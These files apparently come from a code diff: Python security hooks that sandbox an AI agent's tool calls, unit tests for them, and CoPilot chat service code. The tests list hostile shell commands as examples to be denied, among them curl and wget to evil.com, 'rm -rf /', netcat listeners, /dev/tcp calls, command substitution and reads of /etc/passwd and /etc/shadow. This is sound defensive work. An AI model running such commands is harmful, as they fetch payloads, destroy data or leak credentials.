- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
"""
path = tool_input.get("file_path") or tool_input.get("path") or ""
if not path:
# Glob/Grep without a path default to cwd which is already sandboxed
return {}
resolved = os.path.normpath(os.path.expanduser(path))
# Allow access within the SDK working directory
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
return {}
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
return {}
logger.warning(
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
)
return _deny(
f"Tool '{tool_name}' can only access files within the workspace directory."
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
# Tokenize with shlex (respects quotes), then extract command names.
# shlex preserves shell operators like | ; && || as separate tokens.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Validate that a tool call is allowed.
Returns:
Empty dict to allow, or dict with hookSpecificOutput to deny
"""
# Block forbidden tools
if tool_name in BLOCKED_TOOLS:
logger.warning(f"Blocked tool access attempt: {tool_name}")
return _deny(
f"Tool '{tool_name}' is not available. "
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
# Check for dangerous patterns in tool input
# Use json.dumps for predictable format (str() produces Python repr)
input_str = json.dumps(tool_input) if tool_input else ""
for pattern in DANGEROUS_PATTERNS:
if re.search(pattern, input_str, re.IGNORECASE):
logger.warning(
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
)
return _deny("Input contains blocked pattern")
return {}
def _validate_user_isolation(
tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
"""Validate that tool calls respect user isolation."""
# For workspace file tools, ensure path doesn't escape
if "workspace" in tool_name.lower():
path = tool_input.get("path", "") or tool_input.get("file_path", "")
if path:
# Check for path traversal
if ".." in path or path.startswith("/"):
logger.warning(
f"Blocked path traversal attempt: {path} by user {user_id}"
)
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "Path traversal not allowed",
}
}
return {}
def create_security_hooks(
user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Create the security hooks configuration for Claude Agent SDK.
Includes security validation and observability hooks:
- PreToolUse: Security validation before tool execution
- PostToolUse: Log successful tool executions
- PostToolUseFailure: Log and handle failed tool executions
- PreCompact: Log context compaction events (SDK handles compaction automatically)
Args:
user_id: Current user ID for isolation validation
sdk_cwd: SDK working directory for workspace-scoped tool validation
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def pre_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Combined pre-tool-use validation hook."""
_ = context # unused but required by signature
tool_name = cast(str, input_data.get("tool_name", ""))
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
# Strip MCP prefix for consistent validation
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
# Only block non-CoPilot tools; our MCP-registered tools
# (including Read for oversized results) are already sandboxed.
if not is_copilot_tool:
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
if result:
return cast(SyncHookJSONOutput, result)
# Validate user isolation
result = _validate_user_isolation(clean_name, tool_input, user_id)
if result:
return cast(SyncHookJSONOutput, result)
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log successful tool executions for observability."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_failure_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log failed tool executions for debugging."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
error = input_data.get("error", "Unknown error")
logger.warning(
f"[SDK] Tool failed: {tool_name}, error={error}, "
f"user={user_id}, tool_use_id={tool_use_id}"
)
return cast(SyncHookJSONOutput, {})
async def pre_compact_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log when SDK triggers context compaction.
The SDK automatically compacts conversation history when it grows too large.
This hook provides visibility into when compaction happens.
"""
_ = context, tool_use_id
trigger = input_data.get("trigger", "auto")
logger.info(
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
)
return cast(SyncHookJSONOutput, {})
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
],
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
}
except ImportError:
# Fallback for when SDK isn't available - return empty hooks
logger.warning("claude-agent-sdk not available, security hooks disabled")
return {}

View File

@@ -0,0 +1,258 @@
"""Unit tests for SDK security hooks."""
import os
from .security_hooks import _validate_tool_access, _validate_user_isolation
SDK_CWD = "/tmp/copilot-abc123"
def _is_denied(result: dict) -> bool:
hook = result.get("hookSpecificOutput", {})
return hook.get("permissionDecision") == "deny"
# -- Blocked tools -----------------------------------------------------------
def test_blocked_tools_denied():
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
def test_unknown_tool_allowed():
result = _validate_tool_access("SomeCustomTool", {})
assert result == {}
# -- Workspace-scoped tools --------------------------------------------------
def test_read_within_workspace_allowed():
result = _validate_tool_access(
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_write_within_workspace_allowed():
result = _validate_tool_access(
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_edit_within_workspace_allowed():
result = _validate_tool_access(
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_glob_within_workspace_allowed():
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_grep_within_workspace_allowed():
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_outside_workspace_denied():
result = _validate_tool_access(
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_write_outside_workspace_denied():
result = _validate_tool_access(
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_traversal_attack_denied():
result = _validate_tool_access(
"Read",
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
sdk_cwd=SDK_CWD,
)
assert _is_denied(result)
def test_no_path_allowed():
"""Glob/Grep without a path argument defaults to cwd — should pass."""
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_no_cwd_denies_absolute():
"""If no sdk_cwd is set, absolute paths are denied."""
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
assert _is_denied(result)
# -- Tool-results directory --------------------------------------------------
def test_read_tool_results_allowed():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_claude_projects_without_tool_results_denied():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------
def test_dangerous_pattern_blocked():
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
assert _is_denied(result)
def test_subprocess_pattern_blocked():
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
assert _is_denied(result)
# -- User isolation ----------------------------------------------------------
def test_workspace_path_traversal_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_absolute_path_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_normal_path_allowed():
result = _validate_user_isolation(
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
)
assert result == {}
def test_non_workspace_tool_passes_isolation():
result = _validate_user_isolation(
"find_agent", {"query": "email"}, user_id="user-1"
)
assert result == {}

View File

@@ -0,0 +1,556 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""
import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any
from backend.util.exceptions import NotFoundError
from ..config import ChatConfig
from ..model import (
ChatMessage,
ChatSession,
Usage,
get_chat_session,
update_session_title,
upsert_chat_session,
)
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamStart,
StreamTextDelta,
StreamToolInputAvailable,
StreamToolOutputAvailable,
StreamUsage,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
COPILOT_TOOL_NAMES,
create_copilot_mcp_server,
set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
logger = logging.getLogger(__name__)
config = ChatConfig()
# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _resolve_sdk_model() -> str | None:
"""Resolve the model name for the Claude Agent SDK CLI.
Uses ``config.claude_agent_model`` if set, otherwise derives from
``config.model`` by stripping the OpenRouter provider prefix (e.g.,
``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
"""
if config.claude_agent_model:
return config.claude_agent_model
model = config.model
if "/" in model:
return model.split("/", 1)[1]
return model
def _build_sdk_env() -> dict[str, str]:
"""Build env vars for the SDK CLI process.
Routes API calls through OpenRouter (or a custom base_url) using
the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
This gives per-call token and cost tracking on the OpenRouter dashboard.
Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
token are both present — otherwise returns an empty dict so the SDK
falls back to its default credentials.
"""
env: dict[str, str] = {}
if config.api_key and config.base_url:
# Strip /v1 suffix — SDK expects the base URL without a version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
if not base or not base.startswith("http"):
# Invalid base_url — don't override SDK defaults
return env
env["ANTHROPIC_BASE_URL"] = base
env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
# Must be explicitly empty so the CLI uses AUTH_TOKEN instead
env["ANTHROPIC_API_KEY"] = ""
return env
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
Sanitizes session_id, then validates the resulting path stays under /tmp/
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
"""
# Step 1: Sanitize - only allow alphanumeric and hyphens
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
if not safe_id:
raise ValueError("Session ID is empty after sanitization")
# Step 2: Construct path with known-safe prefix
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
# Step 3: Validate the path is still under our prefix (prevent traversal)
if not cwd.startswith(_SDK_CWD_PREFIX):
raise ValueError(f"Session path escaped prefix: {cwd}")
# Step 4: Additional assertion for defense-in-depth
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
return cwd
def _cleanup_sdk_tool_results(cwd: str) -> None:
"""Remove SDK tool-result files for a specific session working directory.
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
We clean only the specific cwd's results to avoid race conditions between
concurrent sessions.
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
"""
import shutil
# Security check 1: Validate cwd is under the expected prefix
normalized = os.path.normpath(cwd)
if not normalized.startswith(_SDK_CWD_PREFIX):
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
return
# Security check 2: Ensure no path traversal in the normalized path
if ".." in normalized:
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
return
# SDK encodes the cwd path by replacing '/' with '-'
encoded_cwd = normalized.replace("/", "-")
# Construct the project directory path (known-safe home expansion)
claude_projects = os.path.expanduser("~/.claude/projects")
project_dir = os.path.join(claude_projects, encoded_cwd)
# Security check 3: Validate project_dir is under ~/.claude/projects
project_dir = os.path.normpath(project_dir)
if not project_dir.startswith(claude_projects):
logger.warning(
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
)
return
results_dir = os.path.join(project_dir, "tool-results")
if os.path.isdir(results_dir):
for filename in os.listdir(results_dir):
file_path = os.path.join(results_dir, filename)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except OSError:
pass
# Also clean up the temp cwd directory itself
try:
shutil.rmtree(normalized, ignore_errors=True)
except OSError:
pass
async def _compress_conversation_history(
session: ChatSession,
) -> list[ChatMessage]:
"""Compress prior conversation messages if they exceed the token threshold.
Uses the shared compress_context() from prompt.py which supports:
- LLM summarization of old messages (keeps recent ones intact)
- Progressive content truncation as fallback
- Middle-out deletion as last resort
Returns the compressed prior messages (everything except the current message).
"""
prior = session.messages[:-1]
if len(prior) < 2:
return prior
from backend.util.prompt import compress_context
# Convert ChatMessages to dicts for compress_context
messages_dict = []
for msg in prior:
msg_dict: dict[str, Any] = {"role": msg.role}
if msg.content:
msg_dict["content"] = msg.content
if msg.tool_calls:
msg_dict["tool_calls"] = msg.tool_calls
if msg.tool_call_id:
msg_dict["tool_call_id"] = msg.tool_call_id
messages_dict.append(msg_dict)
try:
import openai
async with openai.AsyncOpenAI(
api_key=config.api_key, base_url=config.base_url, timeout=30.0
) as client:
result = await compress_context(
messages=messages_dict,
model=config.model,
client=client,
)
except Exception as e:
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
# Fall back to truncation-only (no LLM summarization)
result = await compress_context(
messages=messages_dict,
model=config.model,
client=None,
)
if result.was_compacted:
logger.info(
f"[SDK] Context compacted: {result.original_token_count} -> "
f"{result.token_count} tokens "
f"({result.messages_summarized} summarized, "
f"{result.messages_dropped} dropped)"
)
# Convert compressed dicts back to ChatMessages
return [
ChatMessage(
role=m["role"],
content=m.get("content"),
tool_calls=m.get("tool_calls"),
tool_call_id=m.get("tool_call_id"),
)
for m in result.messages
]
return prior
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
"""Format conversation messages into a context prefix for the user message.
Returns a string like:
<conversation_history>
User: hello
You responded: Hi! How can I help?
</conversation_history>
Returns None if there are no messages to format.
"""
if not messages:
return None
lines: list[str] = []
for msg in messages:
if not msg.content:
continue
if msg.role == "user":
lines.append(f"User: {msg.content}")
elif msg.role == "assistant":
lines.append(f"You responded: {msg.content}")
# Skip tool messages — they're internal details
if not lines:
return None
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
async def stream_chat_completion_sdk(
session_id: str,
message: str | None = None,
tool_call_response: str | None = None, # noqa: ARG001
is_user_message: bool = True,
user_id: str | None = None,
retry_count: int = 0, # noqa: ARG001
session: ChatSession | None = None,
context: dict[str, str] | None = None, # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream chat completion using Claude Agent SDK.
Drop-in replacement for stream_chat_completion with improved reliability.
"""
if session is None:
session = await get_chat_session(session_id, user_id)
if not session:
raise NotFoundError(
f"Session {session_id} not found. Please create a new session first."
)
if message:
session.messages.append(
ChatMessage(
role="user" if is_user_message else "assistant", content=message
)
)
if is_user_message:
track_user_message(
user_id=user_id, session_id=session_id, message_length=len(message)
)
session = await upsert_chat_session(session)
# Generate title for new sessions (first user message)
if is_user_message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
first_message = user_messages[0].content or message or ""
if first_message:
task = asyncio.create_task(
_update_title_async(session_id, first_message, user_id)
)
_background_tasks.add(task)
task.add_done_callback(_background_tasks.discard)
# Build system prompt (reuses non-SDK path with Langfuse support)
has_history = len(session.messages) > 1
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
yield StreamStart(messageId=message_id, taskId=task_id)
stream_completed = False
# Use a session-specific temp dir to avoid cleanup race conditions
# between concurrent sessions.
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
mcp_server = create_copilot_mcp_server()
sdk_model = _resolve_sdk_model()
# Initialize Langfuse tracing (no-op if not configured)
tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
# Merge security hooks with optional tracing hooks
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
tracing_hooks = create_tracing_hooks(tracer)
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
options = ClaudeAgentOptions(
system_prompt=system_prompt,
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
allowed_tools=COPILOT_TOOL_NAMES,
hooks=combined_hooks, # type: ignore[arg-type]
cwd=sdk_cwd,
max_buffer_size=config.claude_agent_max_buffer_size,
model=sdk_model,
env=_build_sdk_env(),
user=user_id or None,
max_budget_usd=config.claude_agent_max_budget_usd,
)
adapter = SDKResponseAdapter(message_id=message_id)
adapter.set_task_id(task_id)
async with tracer, ClaudeSDKClient(options=options) as client:
current_message = message or ""
if not current_message and session.messages:
last_user = [m for m in session.messages if m.role == "user"]
if last_user:
current_message = last_user[-1].content or ""
if not current_message.strip():
yield StreamError(
errorText="Message cannot be empty.",
code="empty_prompt",
)
yield StreamFinish()
return
# Build query with conversation history context.
# Compress history first to handle long conversations.
query_message = current_message
if len(session.messages) > 1:
compressed = await _compress_conversation_history(session)
history_context = _format_conversation_context(compressed)
if history_context:
query_message = (
f"{history_context}\n\n"
f"Now, the user says:\n{current_message}"
)
logger.info(
f"[SDK] Sending query: {current_message[:80]!r}"
f" ({len(session.messages)} msgs in session)"
)
tracer.log_user_message(current_message)
await client.query(query_message, session_id=session_id)
assistant_response = ChatMessage(role="assistant", content="")
accumulated_tool_calls: list[dict[str, Any]] = []
has_appended_assistant = False
has_tool_results = False
async for sdk_msg in client.receive_messages():
logger.debug(
f"[SDK] Received: {type(sdk_msg).__name__} "
f"{getattr(sdk_msg, 'subtype', '')}"
)
tracer.log_sdk_message(sdk_msg)
for response in adapter.convert_message(sdk_msg):
if isinstance(response, StreamStart):
continue
yield response
if isinstance(response, StreamTextDelta):
delta = response.delta or ""
# After tool results, start a new assistant
# message for the post-tool text.
if has_tool_results and has_appended_assistant:
assistant_response = ChatMessage(
role="assistant", content=delta
)
accumulated_tool_calls = []
has_appended_assistant = False
has_tool_results = False
session.messages.append(assistant_response)
has_appended_assistant = True
else:
assistant_response.content = (
assistant_response.content or ""
) + delta
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolInputAvailable):
accumulated_tool_calls.append(
{
"id": response.toolCallId,
"type": "function",
"function": {
"name": response.toolName,
"arguments": json.dumps(response.input or {}),
},
}
)
assistant_response.tool_calls = accumulated_tool_calls
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolOutputAvailable):
session.messages.append(
ChatMessage(
role="tool",
content=(
response.output
if isinstance(response.output, str)
else str(response.output)
),
tool_call_id=response.toolCallId,
)
)
has_tool_results = True
elif isinstance(response, StreamUsage):
session.usage.append(
Usage(
prompt_tokens=response.promptTokens,
completion_tokens=response.completionTokens,
total_tokens=response.totalTokens,
)
)
elif isinstance(response, StreamFinish):
stream_completed = True
if stream_completed:
break
if (
assistant_response.content or assistant_response.tool_calls
) and not has_appended_assistant:
session.messages.append(assistant_response)
except ImportError:
logger.warning(
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
)
async for response in stream_with_anthropic(
session, system_prompt, text_block_id
):
if isinstance(response, StreamFinish):
stream_completed = True
yield response
await upsert_chat_session(session)
logger.debug(
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
)
if not stream_completed:
yield StreamFinish()
except Exception as e:
logger.error(f"[SDK] Error: {e}", exc_info=True)
try:
await upsert_chat_session(session)
except Exception as save_err:
logger.error(f"[SDK] Failed to save session on error: {save_err}")
yield StreamError(
errorText="An error occurred. Please try again.",
code="sdk_error",
)
yield StreamFinish()
finally:
_cleanup_sdk_tool_results(sdk_cwd)
async def _update_title_async(
session_id: str, message: str, user_id: str | None = None
) -> None:
"""Background task to update session title."""
try:
title = await _generate_session_title(
message, user_id=user_id, session_id=session_id
)
if title:
await update_session_title(session_id, title)
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
except Exception as e:
logger.warning(f"[SDK] Failed to update session title: {e}")

View File

@@ -0,0 +1,321 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""
import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool
logger = logging.getLogger(__name__)
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
"current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
"current_tool_call_id", default=None
)
# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
"pending_tool_outputs", default=None # type: ignore[arg-type]
)
def set_execution_context(
user_id: str | None,
session: ChatSession,
tool_call_id: str | None = None,
) -> None:
"""Set the execution context for tool calls.
This must be called before streaming begins to ensure tools have access
to user_id and session information.
"""
_current_user_id.set(user_id)
_current_session.set(session)
_current_tool_call_id.set(tool_call_id)
_pending_tool_outputs.set({})
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
"""Get the current execution context."""
return (
_current_user_id.get(),
_current_session.get(),
_current_tool_call_id.get(),
)
def pop_pending_tool_output(tool_name: str) -> str | None:
"""Pop and return the stashed full output for *tool_name*.
The SDK CLI may truncate large tool results (writing them to disk and
replacing the content with a file reference). This stash keeps the
original MCP output so the response adapter can forward it to the
frontend for proper widget rendering.
Returns ``None`` if nothing was stashed for *tool_name*.
"""
pending = _pending_tool_outputs.get(None)
if pending is None:
return None
return pending.pop(tool_name, None)
def create_tool_handler(base_tool: BaseTool):
"""Create an async handler function for a BaseTool.
This wraps the existing BaseTool._execute method to be compatible
with the Claude Agent SDK MCP tool format.
"""
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Execute the wrapped tool and return MCP-formatted response."""
user_id, session, tool_call_id = get_execution_context()
if session is None:
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": "No session context available",
"type": "error",
}
),
}
],
"isError": True,
}
try:
# Call the existing tool's execute method
# Generate unique tool_call_id per invocation for proper correlation
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
result = await base_tool.execute(
user_id=user_id,
session=session,
tool_call_id=effective_id,
**args,
)
# The result is a StreamToolOutputAvailable, extract the output
text = (
result.output
if isinstance(result.output, str)
else json.dumps(result.output)
)
